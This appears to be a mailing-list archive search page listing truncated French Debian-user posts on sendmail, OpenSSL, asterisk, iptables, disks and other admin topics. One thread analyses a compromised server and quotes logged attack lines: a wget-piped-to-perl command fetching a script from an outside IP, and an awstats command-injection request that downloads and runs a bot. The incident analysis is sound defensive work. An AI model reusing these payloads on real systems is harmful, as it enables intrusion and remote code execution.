Je me réponds à moi-même.
J'ai trouvé au fin fond du bouquin O'Reilly (Sendmail, 4th edition) une
solution :
GreetPause:192.168 0
# Pas d'authentification pour 127.0.0.1
Srv_Features:127.0.0.1 ALS
Je demande donc à sendmail de ne pas proposer AUTH (A), de ne pas
Bonjour à tous,
J'ai un petit souci avec une grosse configuration sendmail (merci de ne
pas commencer par me dire qu'il faut passer à autre chose).
Cette configuration fonctionne correctement depuis des années avec
toutes les grouilles nécessaires (dmarc, dkim, clamav,
ajh-valmer a écrit :
> On Saturday 06 July 2024 10:56:54 benoit wrote:
>> Le vendredi 5 juillet 2024 à 22:19, Dethegeek a écrit :
>>> C'est une bonne question. Comment est déterminé le MTBF ?
>>> Par experimentation sur des exemplaires avant mise en production
>>> de masse, par simulations ?
>
Sébastien Dinot a écrit :
> À l'époque où l'on gravait encore des DVD, je me souviens qu'un
> fabricant proposait des DVD en verre, vendus une fortune, dont la durée
> de conservation annoncée était de 4 000 ans.
1/ On grave toujours des DVD (et d'autres supports optiques).
2/ Le
Dethegeek a écrit :
> C'est une bonne question. Comment est déterminé le MTBF ? Par
> experimentation sur des exemplaires avant mise en production de masse,
> par simulations ?
>
> Un MTBF DE 2.5 millions d'heures équivaut à 285 ans. Soit j'ai fait un
> erreur de logique pour calculer soit cette
benoit a écrit :
> Le vendredi 5 juillet 2024 à 21:56, benoit a écrit :
>
>> J'ai regardé les disque durs avec une moyenne de 2 500 000 h avant panne,
>> c'est pas donné. Le moins chers que j'ai trouvé est à 240€ pour un Toshiba
>> MG07ACA de 14 To et en plus c'est du 3,5 pouces et mon rack
J'ai enfin réussi à avoir un retour des devs d'OpenSSL. Il faut dans
leur technique de détection des fins de message toujours au moins un
octet de bourrage. Donc si le message fait un multiple entier d'une
longueur de bloc, on se tape un bloc entier en bourrage. Une fois
expliqué, c'est
didier gaumet a écrit :
> Le 04/07/2024 à 20:44, BERTRAND Joël a écrit :
>> didier gaumet a écrit :
> [...]
>>> https://stackoverflow.com/questions/71763461/purpose-of-evp-encryptfinal-ex-function-in-openssl
>>>
> [...]
>
>> Ce que je ne saisis pas, c'est
didier gaumet a écrit :
> préambule lamentable: j'ai lu ta bafouille en diagonale, je n'ai pas le
> niveau, j'ai pas envie de creuser, etc... donc ma réponse ne va
> peut-être pas être très pertinente, désolé ;-)
>
> En très gros de la part d'un inculte du sujet, même si la fonction
> openssl
Bonjour à tous,
Désolé de venir avec un problème pas tout à fait Debian. J'essaye de
m'inscrire sur les listes de diffusion OpenSSL depuis plusieurs jours
sans aucun retour. Je pense que des lecteurs ont déjà été confrontés au
problème.
J'utilise OpenSSL (3.3.1) pour
Olivier a écrit :
> Quelques pistes:
> - soit n'arrive pas à accéder à une ressources parce qu'une autre
> instance de fail2ban ou d'un service, a déjà l'accès exclusif à cette
> ressource
> - soit un simple problème de droits d'accès sur cette ressource
> (droits sur le fichier, son répertoire,
Bonjour à tous,
Je viens de mettre un serveur de test à jour et fail2ban râle. Je ne
vois pas ce qui ne lui plaît pas d'autant qu'il n'est pas verbeux.
Ma configuration fail2ban fonctionne parfaitement avec la version
1.0.2-2. Avec la version poussée dans testing
didier gaumet a écrit :
> Le 12/06/2024 à 10:31, BERTRAND Joël a écrit :
>> Bonjour à tous,
>>
>> Je dois faire quelques tests avec une imprimante 3D et un logiciel ne
>> fonctionnant que sous Windows. J'ai donc installé W10 dans une machine
>> virtuelle (v
Bonjour à tous,
Je dois faire quelques tests avec une imprimante 3D et un logiciel ne
fonctionnant que sous Windows. J'ai donc installé W10 dans une machine
virtuelle (virtmanager). Le réseau fonctionne bien. J'aimerais
maintenant pouvoir partager un disque réseau avec virtiofs
didier gaumet a écrit :
> Le 06/05/2024 à 09:42, BERTRAND Joël a écrit :
> [...]
>> Si je regarde par exemple libwxgtk3.2-1t64, le seul fichier
>> d'en-têtes
>> semble être libwxgtk3.2-dev qui veut désinstaller libwxgtk3.2-1t64 pour
>> remettre libwxgtk3
Basile Starynkevitch a écrit :
>
> On 5/6/24 09:42, BERTRAND Joël wrote:
>> Bonjour à tous,
>>
>> Il vient d'y avoir une salve de bibliothèques avec une extension t64
>> (pour time_t en 64 bits contre 32). Très bien, mais quelqu'un saurait-il
>&g
Bonjour à tous,
Il vient d'y avoir une salve de bibliothèques avec une extension t64
(pour time_t en 64 bits contre 32). Très bien, mais quelqu'un saurait-il
où trouver les fichiers d'en-tête correspondant ?
Si je regarde par exemple libwxgtk3.2-1t64, le seul fichier
Gabriel Moreau a écrit :
> Vrai pour Apple dont le noyau Darwin est un dérivé des BSD.
Non, le noyau est un micronoyau avec des serveurs de type Unix par
dessus (du code pompé à Free et NetBSD). C'est le pire truc qui puisse
exister.
> Faux pour
> Windows qui n'a rien d'UNIX. Windows NT
François TOURDE a écrit :
> Le 19846ième jour après Epoch,
> Olivier écrivait:
>
>> Bonjour,
>>
>> J'envisage de mettre en place un serveur DNS dont le rôle serait de
>> résoudre des requêtes sur un de mes domaines.
>
> Il y a des chances que ton registrar te propose son propre DNS. Pourquoi
>
didier gaumet a écrit :
>
> Bonjour,
Bonsoir,
> avertissement: je n'y connais absolument rien et je réponds peut-être au
> moins en partie à côté de la question que tu poses
L'essentiel est de participer ;-)
Plus sérieusement, merci d'apporter un nouvel éclairage sur
Bonjour à tous,
Je viens de câbler une interface USB vers RS232 + GPIO qui fonctionne
avec un composant CY7C65211.
Celui-ci est reconnu comme un thermomètre par le noyau Linux. J'ai donc
rajouté une règle udev pour corriger cela :
KERNEL=="*", SUBSYSTEM=="usb",
NoSpam a écrit :
> Bonsoir
>
> Le 26/03/2024 à 18:13, BERTRAND Joël a écrit :
>> [...]
>>
>> Deuxième question : le serveur FTP est un OS un peu spécial qui ne
>> comprend pas IPv6. Est-il possible de rediriger IPv6 sur du V4 de
>> manière transpar
Bonjour à tous,
J'essaie d'installer sans succès un reverse ftp proxy et je me demande
si ce que je cherche à faire est possible.
Configuration :
IP publique --- serveur frontal Linux --- LAN --- serveur FTP anonyme
L'IP publique est propre au serveur FTP que je
Bonjour,
Il y a un gros problème avec gnutls mais je pensais que ça se limitais
à testing. J'ai réussi à m'en sortir hier en forçant l'installation de
la mise à jour de gnutls et de ses dépendances et en _réinstallant_ le
reste qui a été viré par un dist-upgrade. Seul cups est
Bonsoir à tous,
je viens de m'apercevoir que sensord n'est plus disponible dans les
dépôts. C'était une chose très pratique qui balançait dans syslog les
sorties de sensors lorsqu'il y avait une alarme de température. Par quoi
est-ce que cela a été remplacé, je ne trouve rien...
Je ne sais pas pourquoi je ne peux pas avoir la copie du mail dans la
réponse. On va donc copier à la main.
>Pour l’architecture globale, si je comprends bien c’est :
Un serveur de fichiers sous un *nix contenant à la fois les boot des
PC et leurs données
Des postes sans disque
zithro a écrit :
> On 24 Feb 2024 23:23, BERTRAND Joël wrote:
>> Un gros serveur sous NetBSD et toutes les stations sont diskless et
>> bootent sur le réseau. Les disques sont en NFS et les swaps en iSCSI.
>
> Peux-tu expliquer ce choix (NFS vs iSCSI) stp ?
Oui,
Basile Starynkevitch a écrit :
>
> On 2/23/24 12:02, Erwann Le Bras wrote:
>>
>> Bonjour
>>
>> Peut-être faire des essais avec SSHFS? le $HOME des utilisateurs
>> serait monté sur chaque client au boot.
>>
>> Mais je ne sais pas si c'est plus efficace que NFS.
>>
>
> J'aurais tendance à imaginer
C'est bien le fait de ne pas avoir usrmerge qui est le fautif parce que
les scripts d'installation ne contiennent plus le PATH canonique !
Je ne dirais pas ce que je pense.
signature.asc
Description: OpenPGP digital signature
Michel Verdier a écrit :
> Le 8 janvier 2024 BERTRAND Joël a écrit :
>
>> J'ai déjà trouvé par le passé mount.nfs qui n'est plus dans /sbin mais
>> dans /usr/sbin (contrairement à ce qu'indique la page man).
> [...]
>> Que les devs de Debian forcent l'utilis
Bon.
J'ai un début de piste et ça commence à être gavant.
J'ai déjà trouvé par le passé mount.nfs qui n'est plus dans /sbin mais
dans /usr/sbin (contrairement à ce qu'indique la page man).
Là, on se retrouve avec des PATH dans des scripts de démarrage qui ne
ajh-valmer a écrit :
> On Sunday 07 January 2024 19:47:19 BERTRAND Joël wrote:
>> ... apt dist-upgrade (qui s'est achevé sans erreur).
>> Aujourd'hui, je rallume la machine en question et je n'ai plus de
>> session graphique ... :
>
> Sans doute, suite à l'upgrade, le n
Michel Verdier a écrit :
> Le 7 janvier 2024 BERTRAND Joël a écrit :
>
>> Hier, j'ai du configurer ce qu'il fallait pour pouvoir accéder à des
>> bluerays. Très bien, ça fonctionnait. Mais pour cela, j'ai du passer un
>> apt dist-upgrade (qui s'est achevé sans erreur)
Bonjour à tous et bonne année.
Il m'arrive un truc étonnant sur une machine qui me sert de serveur
multimedia. Cette machine est diskless et fonctionnait parfaitement
jusqu'à hier (pas noté la version du noyau). Ce n'est pas une Debian,
c'est une Devuan, mais les paquets et la
Bon, trouvé.
Dans tcpServer.c, il faut remonter d'une ligne close(newSocket).
Désolé pour le bruit.
signature.asc
Description: OpenPGP digital signature
Désolé, j'ai oublié le code serveur.
JB
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT
int main(){
int sockfd, ret;
struct sockaddr_in serverAddr;
int newSocket;
struct sockaddr_in newAddr;
socklen_t addr_size;
char
Je viens de reproduire la chose avec deux bouts de programmes écrits en
C (voir les deux pièces jointes).
hilbert:[~/rpl-test] > ./server
[+]Server Socket is created.
[+]Bind to port
[+]Listening
accept(3, 4)
Connection accepted from 127.0.0.1:43388
Client: aze
Disconnected from
e programme finit par planter faute de descripteur de socket
disponible (trop de fichiers ouverts).
Je viens de passer le code dans valgrind et je ne comprends pas bien :
Root rayleigh:[~/exemple] > valgrind --track-fds=yes ./connecteur.rpl
+++RPL/2 (R) version 4.1.35 (Jeudi 23/11/20
yamo' a écrit :
> BERTRAND Joël a tapoté le 17/10/2023 17:10:
>> Bonjour à tous,
>
> Bonjour,
>
>>
>> Je tente la configuration d'inn (parce que depuis que le service chez
>> Nerim a été laissé en déshérence, je fais avec celui de free.fr qui est
>
Erwan David a écrit :
> Le 17/10/2023 à 17:05, BERTRAND Joël a écrit :
>> Bonjour à tous,
>>
>> Je tente la configuration d'inn (parce que depuis que le service chez
>> Nerim a été laissé en déshérence, je fais avec celui de free.fr qui est
>> à peine mieux
Bonjour à tous,
Je tente la configuration d'inn (parce que depuis que le service chez
Nerim a été laissé en déshérence, je fais avec celui de free.fr qui est
à peine mieux...) et il y a un point que je ne comprends pas bien.
inn est censé se connecter à d'autres serveurs
Bonjour à tous,
J'essaye d'installer une bibliothèque python (et je me souviens
pourquoi je hais ce truc, mais c'est une autre histoire).
La bibliothèque en question est pcbnewTransition qui a un makefile.
Parfait, je sais créer le paquet :
[~] > make package
Je
Gaëtan Perrier a écrit :
> Par exemple le raytracing ne semble pas supporté sur les cartes AMD
> alors qu'il fonctionne sur Nvidia (ainsi que le DLSS) ?
Chez AMD, on trouve le FSR qui semble aussi efficace. Quant au
raytracing, la carte que j'utilise ne doit pas savoir qu'il n'est pas
ajh-valmer a écrit :
> Les cartes Nvidia ont une très bonne qualité de rendu à l'écran.
> avec leur pilote, il y a une configuration sophistiquée de la carte,
> permettant d'améliorer le rendu (nvidia-settings).
> Les pilotes libres n'ont pas cet outil de config.
> Seulement, leurs pilotes ne
Gaëtan Perrier a écrit :
> Je suis d'accord sur le fond mais le problème c'est que les cartes
> NVIDIA, d'après tout ce je lis, semblent être les plus performantes.
> Là j'envisage de changer de PC car il commence à atteindre ses limites,
> et en cherchant un peu je vois que le support des
ajh-valmer a écrit :
> On Tuesday 12 September 2023 23:24:24 Gaëtan Perrier wrote:
>> Les pilotes nvidia legacy 390 de sid étant maintenant compatibles avec les
>> kernel jusqu'à 6.5 je suis repassé sur le pilote proprio.
>> Avec nouveau c'était invivable.
>
> Je n'ai jamais réussi à faire
Michel Verdier a écrit :
> Le 25 août 2023 Olivier a écrit :
>
>> 1. Connaissez-vous un document qui justifie techniquement ces
>> "questions de sécurité" ?
>
> La sécurité en vivant caché :) A l'inverse beaucoup de routeurs répondent
> au ping. Si tu fais un traceroute tu le vois bien.
Trouvé.
C'est l'option comp-lzo qui met le bazar. Je l'avais sur les deux
machines clientes (l'une est sur un accès Wanadoo-Santé de 512 kbps, si,
si, ça existe /encore/), l'autre sur un accès GPRS. Je n'avais pas cette
option côté serveur. Visiblement, jusqu'à la dernière version d'OpenVPN,
le
Bonjour à tous,
J'ai un petit souci avec un serveur OpenVPN (qui fonctionnait
parfaitement jusqu'ici). Les clients se connectent bien sur le serveur
mais rien ne passe sur l'interface tap0. Je n'ai rien de particulier
dans les sorties d'OpenVPN (même avec verb=10).
Le
Etienne Vogt a écrit :
>
> Une possible piste est que tomcat9 a des protections additionnelles par
> rapport à tomcat8, donc si on installe une servlet ailleurs que dans les
> chemins par défaut, il faut autoriser l'accès dans
> /etc/systemd/system/tomcat9.service
>
> Par ex. pour un IdP
didier gaumet a écrit :
> Le 06/07/2023 à 08:26, BERTRAND Joël a écrit :
>> didier gaumet a écrit :
>>> Mais ceci étant, le lien -bien qu'extrait du site Alfresco- que je t'ai
>>> indiqué semble justement expliquer comment installer et configurer
>>> *Tomcat* p
didier gaumet a écrit :
> Mais ceci étant, le lien -bien qu'extrait du site Alfresco- que je t'ai
> indiqué semble justement expliquer comment installer et configurer
> *Tomcat* pour le bon fonctionnement d'Alfresco, entre autres les
> chemins, mais pas seulement
>
> Mais bon, j'ai peut-être rien
didier gaumet a écrit :
> Avertissement: si je n'ai pas répondu à ton précédent message c'est que
> je suis totalement inculte sur le sujet
>
> Y a un paragraphe de la doc Alfresco qui a l'air de s'intéresser aux
> aspects du problème qui t'intéresse (regarde à "classpath"):
>
Bonsoir à tous,
Trouvé... Enfin, j'ai trouvé le fautif, mais je ne sais pas trop
comment résoudre le problème.
J'avais galéré pour installer Alfresco et j'avais utilisé la variable
CATALINA_BASE=/opt/alfresco
dans /etc/default/tomcat9. Ça fonctionnait très bien. Sauf
Bonjour à tous,
Désolé de polluer comme ça la liste depuis hier, mais je galère sur une
mise à jour de serveur à la suite d'un déménagement d'infrastructure...
J'ai installé il y a plusieurs années un serveur Alfresco, tout d'abord
en version 6.0 puis en version 6.1.
NoSpam a écrit :
>
> Le 03/07/2023 à 15:12, BERTRAND Joël a écrit :
>> NoSpam a écrit :
>>> Ils n'arrivent jamais plus loin que mangle INPUT qui est avant la table
>>> nat et filter
>> D'accord. Mais dans ce cas, pourquoi sngrep les intercepte ?
> Tout
NoSpam a écrit :
> Ils n'arrivent jamais plus loin que mangle INPUT qui est avant la table
> nat et filter
D'accord. Mais dans ce cas, pourquoi sngrep les intercepte ?
JB
Thomas Trupel a écrit :
> C'est un comportement normal à mes yeux.
>
> L'ajout d'une règle avec la target TRACE devrait te confirmer que les
> paquets sont bloqués par le firewall.
J'obtiens ceci :
2023-07-03T14:37:45.868470+02:00 rayleigh kernel: [705875.038988] TRACE:
raw:PREROUTING:policy:2
Thomas Trupel a écrit :
> C'est un comportement normal à mes yeux.
>
> L'ajout d'une règle avec la target TRACE devrait te confirmer que les
> paquets sont bloqués par le firewall.
Dans le cas de SIP, ils sont tout de même récupérés par sngrep :
[ ] 359 INVITE 100@1.1.1.1
C'est même pire que ça !
Si je fais un nmap depuis l'extérieur sur le serveur en question,
j'obtiens bien :
legendre# nmap 192.168.15.18
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-03 14:09 CEST
Nmap scan report for 192.168.15.18
Host is up (0.00078s latency).
Not shown: 987 filtered tcp
Je l'ai...
Il fallait mettre l'IP du serveur dans contact.
Je pense que la doc d'asterisk est parfaite pour quelqu'un qui sait déjà
exactement de quoi il retourne, mais pour quelqu'un qui en est à sa
première installation, c'est un peu galère. Je vais essayer de rédiger
quelque chose pour les
NoSpam a écrit :
>
> Le 03/07/2023 à 12:57, BERTRAND Joël a écrit :
>> NoSpam a écrit :
>>> Le 03/07/2023 à 12:07, BERTRAND Joël a écrit :
>>>> NoSpam a écrit :
>>>>> Stop: n'as tu pas dit que les postes en interne arrivent à s'appeler ?
>>&
NoSpam a écrit :
>
> Le 03/07/2023 à 12:07, BERTRAND Joël a écrit :
>> NoSpam a écrit :
>>> Stop: n'as tu pas dit que les postes en interne arrivent à s'appeler ?
>>> Si c'est le cas, cela veut dire qu'asterisk ne sait pas comment traiter
>>> l'appel.
&
Bonjour à tous,
Je suis en train de configurer (péniblement) un serveur asterisk qui
est dans un DMZ. Tout le flux entrant sur l'IP publique est naté vers ce
serveur, protégé par un firewall iptables et fail2ban. Il s'agit
d'iptables et non d'iptables-legacy.
Cette
NoSpam a écrit :
> Je me suis mal exprimé: le SPA arrive bien à appeler les autres postes
> ou l'écho test d'Asterisk (extension 600 par défaut si activer) ?
>
> Si oui, le problème est au niveau d'asterisk, vois mon dernier courriel.
Il n'y a que des SPA et ils peuvent tous s'appeler
NoSpam a écrit :
> Stop: n'as tu pas dit que les postes en interne arrivent à s'appeler ?
> Si c'est le cas, cela veut dire qu'asterisk ne sait pas comment traiter
> l'appel.
>
> 34. No circuit/channel available
>
> Renvois STP le context internal
Je réponds à toutes les questions dans le même
NoSpam a écrit :
> Ton asterisk (192.168.1.1) qui répond 503 au SPA
>
> Il faudrait la config complète du SPA
J'ai bien une sauvegarde de la configuration, mais ce n'est pas un
fichier texte :
hilbert:[~] > file SPA112_1.4.1.cfg
SPA112_1.4.1.cfg: dBase III DBT, version number 0
NoSpam a écrit :
>> Je ne saisis pas comment ces paquets arrivent à passer le firewall.
> Ce sont les attaques dont je parlais précédemment. Il semble qu'il y ai
> un trou dans le FW. Y'a pas du nat sur le Cisco pour le wan => lan ?
Le serveur est en DMZ donc récupère tout ce qui
NoSpam a écrit :
> On peut avoir les logs "lisibles", je me demande si ce n'est pas le SPA
> qui envoit cette erreur ...
On va réessayer.
2023/07/03 11:16:49.319643 192.168.10.253:5060 -> 192.168.1.1:5060
INVITE sip:0052@192.168.1.1 SIP/2.0
Via: SIP/2.0/UDP
NoSpam a écrit :
> Ton problème: error 503 Service Unavailable
>
> Es tu sûr que le service est fonctionnel ?! Es tu sûr de la qualité de
> ton lien ? Peux tu basculer en UDP pour tester ?
Le serveur en face ne répond pas en UDP. La réponse est donc non.
Un point me chagrine. À
NoSpam a écrit :
>> rayleigh*CLI> core set verbose 3
>> Console verbose was OFF and is now 3.
>> [Jul 2 23:11:18] WARNING[22514]: res_pjsip.c:2497 set_id_from_hdr:
>> CallerID Name 'BERTRAND Jo�l' for number '6001' has invalid UTF-8
>> characters which were replaced
>> [Jul 2 23:11:18]
NoSpam a écrit :
>
> Le 02/07/2023 à 19:36, BERTRAND Joël a écrit :
>> NoSpam a écrit :
>>> Le 02/07/2023 à 18:27, BERTRAND Joël a écrit :
>>>> [...]
>>>> - tous les appels sortants échouent lamentablement ;
>>> Poste les logs. En cli, core s
NoSpam a écrit :
>
> Le 02/07/2023 à 18:27, BERTRAND Joël a écrit :
>> [...]
>> - tous les appels sortants échouent lamentablement ;
> Poste les logs. En cli, core set verbose 3 puis passe un appel en copie
> les logs ici
>> - les appels entrants font bien sonner l
NoSpam a écrit :
> Fallait dire de suite que c'était pour un SPA ! C'est plus délicat mais
> cela fonctionne
>
> 1. d'ou sort le E accolé au 6001 ?
De nulle part, c'était un test pour ne pas avoir un identifiant
totalement numérique.
Je m'occuperai de cela lorsque j'aurai
NoSpam a écrit :
> sip:6001E@192.168.1.1
>
> https://www.asterisk.org/identifying-endpoint-pjsip/
Rien n'y fait.
Si je colle 6001 dans le SPA112, j'ai bien une trame qui demande une
authentification du login sip:6001E@192.168.1.1. Mais que je colle
username=6001E,
NoSpam a écrit :
> Remplace user=6002 par username=SDA112net2501
Dès que je mets autre chose qu'une suite de chiffres, je reçois ceci
comme erreur :
[Jul 2 15:52:30] NOTICE[9876]: res_pjsip/pjsip_distributor.c:676
log_failed_request: Request 'REGISTER' from '"BERTRAND Jo�l"
' failed for
NoSpam a écrit :
> Bonjour.
Bonjour,
> chan_sip est deprecated depuis longtemps et sera retiré avant la fin de
> l'année. pjsip est son successeur, évolution obligatoire.
>
> J'ose espérer que tes ports 506/5061 UDP & TCP ne sont pas ouverts sur
> Internet, avec ta configuration tu
Bon, j'ai réussi à régler le coup des appels entrants. Le '.' et le '!'
ne peuvent pas être utilisés n'importe où et les regex sont un peu
tatillonnes.
Reste le problème des appels sortants :
[User-standard]
exten => 6001,1,Dial(SIP/6001)
exten => 6002,1,Dial(SIP/6002)
exten =>
Bonjour à tous,
Je tente la configuration d'un serveur asterisk et je me noie un peu
dans la configuration.
Ce que j'ai fait jusqu'à présent :
- installation d'un serveur asterisk (20.3.0~dfsg+~cs6.13.40431413-1) ;
- configuration du fichier users.conf pour rajouter tous
Michel Verdier a écrit :
> Et d'ailleurs pourquoi mixer les outils ?
Pourquoi ? Mais parce que fail2ban dans sa configuration par défaut
s'est mis à utiliser nftables alors qu'il est tout à fait possible
d'utiliser un firewall iptables (xtables) par ailleurs. J'ai d'ailleurs
modifié ces
NoSpam a écrit :
> Bonsoir
>
> https://developers.redhat.com/blog/2020/08/18/iptables-the-two-variants-and-their-relationship-with-nftables#using_iptables_nft
Merci.
Mais ça ne répond pas trop à ma question sauf s'il faut comprendre
entre les lignes que les paquets passent
Bonsoir à tous,
J'ai toujours écrit mes firewalls à la main. Aujourd'hui, un script
charge au démarrage le contenu de /var/lib/iptables/active au travers de
iptables (nf_tables).
Or iptables-legacy est toujours disponible.
J'avoue avoir un peu de mal à comprendre
BERTRAND Joël a écrit :
> BERTRAND Joël a écrit :
>> OK, je l'ai.
>>
>> 2023-06-27T09:12:18.564606+02:00 rayleigh www-data[10579]: shell -c cd
>> /dev/shm;wget -O - http://68.235.39.225/sepax|perl
>> 2023-06-27T09:12:21.381703+02:00 rayleigh www-data[10583]: shell
BERTRAND Joël a écrit :
> OK, je l'ai.
>
> 2023-06-27T09:12:18.564606+02:00 rayleigh www-data[10579]: shell -c cd
> /dev/shm;wget -O - http://68.235.39.225/sepax|perl
> 2023-06-27T09:12:21.381703+02:00 rayleigh www-data[10583]: shell -c cd
> /dev/shm;wget -O - http://68.235
OK, je l'ai.
2023-06-27T09:12:18.564606+02:00 rayleigh www-data[10579]: shell -c cd
/dev/shm;wget -O - http://68.235.39.225/sepax|perl
2023-06-27T09:12:21.381703+02:00 rayleigh www-data[10583]: shell -c cd
/dev/shm;wget -O - http://68.235.39.225/sepax|perl
J'ai le script perl (mais vous pouvez
Michel Verdier a écrit :
> Le 25 juin 2023 BERTRAND Joël a écrit :
>
>> Petite remarque : j'ai modifié allow_url_fopen de on à off dans le
>> fichier de configuration de php 8.2 (je ne vois pas pourquoi c'est 'on'
>> par défaut). /tmp est maintenant en noexec.
>
BERTRAND Joël a écrit :
> #!/bin/bash
>
> if [ $1 == "/usr/bin/rlog" ]; then exit 0; fi
> if [ $1 == "/usr/bin/rcsdiff" ]; then exit 0; fi
> logger -i "shell $*"
> for i in $(pstree -p); do logger -i $i; done
>
> exec $*
Ce script
Erwann Le Bras a écrit :
> bonjour
Bonjour,
> plusieurs pistes :
>
> - un truc qui se lance au démarrage de la machine et reste bien planqué
> qui lance la saleté de temps en temps) ?
> Je pense par exemple, s'il a exploité une faille de Apache à la base, a
> pu modifié la config pour
NoSpam a écrit :
> Bonjour
>
> rkhunter et chkrootkit ne détectent rien ?
chkrootkit ne couine pas (il tourne depuis des années dans un cron).
rkhunter que j'ai lancé hier non plus.
Sébastien Dinot a écrit :
> BERTRAND Joël a écrit :
>> Porte d'entrée trouvée :
>
> Merci pour ce retour, toujours intéressant à avoir.
Porte d'entrée trouvée, mais il reste des scories. Je suis en train de
logguer ce que fait sh pour savoir quel est le processus qui m
Porte d'entrée trouvée :
GET
/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20131%2e220%2e92%2e80%2fcacat%3bchmod%20%2bx%20cacat%3b%2e%2fcacat%20216%2e102%2e212%2e115;echo%20YYY;echo|
HTTP/1.1\n"
"GET
Quelques nouvelles.
Le bot en question est une version moderne d'un vieux truc (on en
trouve des traces depuis 2003) :
https://www.politoinc.com/post/2015/04/01/analysis-of-a-romanian-botnet
https://forum.directadmin.com/threads/cannot-restart-apache.17795/
Sébastien Dinot a écrit :
> Le 2023-06-23 10:08, BERTRAND Joël a écrit :
>> Ma question est donc assez simple ;-) Comment trouver par quoi sont
>> lancés ces deux processus ?
>
> En pareille circonstance, il n'y a qu'une seule solution : analyse du
> disque depuis un
Bonjour à tous,
Je reviens au sujet de ma machine vérolée. J'ai un peu avancé sur le
sujet. J'ai trouvé la porte d'entrée et corrigé.
Le processus hwm est un mineur de bitcoin. Celui-ci a été éradiqué et
ne revient plus m'embêter.
À intervalle régulier (ce matin
hamster a écrit :
> Le 16/06/2023 à 11:21, BERTRAND Joël a écrit :
>> hamster a écrit :
>>> Le 16/06/2023 à 08:34, BERTRAND Joël a écrit :
>>>> Bonjour,
>>>>
>>>> J'en pense que c'est un Seagate. J'ai eu des tas de disques
>>&g
hamster a écrit :
> Le 16/06/2023 à 08:34, BERTRAND Joël a écrit :
>> Bonjour,
>>
>> J'en pense que c'est un Seagate. J'ai eu des tas de disques comme ça
>> qui montraient des valeurs aberrantes et j'ai creusé. Il s'avère que le
>> problème est un firmware
hamster a écrit :
> j'ai un disque dur pour lequel badblocks s'est terminé sans erreurs,
> l'auto-test de smart s'est aussi terminé sans erreurs, pourtant dans le
> rapport de smart je vois 3 chiffres qui m'inquietent :
> Raw_Read_Error_Rate 70428466
> Seek_Error_Rate 371778543
> 149 --- Number
Bonjour à tous,
Je poste ici en sachant parfaitement que je suis hors sujet, mais je
pense que certains ont été confrontés au même problème. Merci de
répondre directement et non sur la liste pour ne pas polluer.
Ancien client Nerim, je me retrouve malheureusement chez
Michel Verdier a écrit :
> Le 31 mai 2023 BERTRAND Joël a écrit :
>
>> C'est donc un blog (b2evolution) qui traîne-là qui est percé. Quelqu'un
>> sait-il d'ailleurs sur quoi migrer un blog b2evolution ? b2evolution
>> n'est plus supporté. J'ai bien vu ceci que
Basile Starynkevitch a écrit :
>
> On 5/31/23 09:55, BERTRAND Joël wrote:
>> Bonjour à tous,
>>
>> Hier soir, je me suis aperçu qu'un serveur ramait énormément. En
>> regardant de près, j'ai trouvé un exécutable étrange :
>>
>> /dev/shm/hwm
>
1 - 100 sur 822 matches
Mail list logo
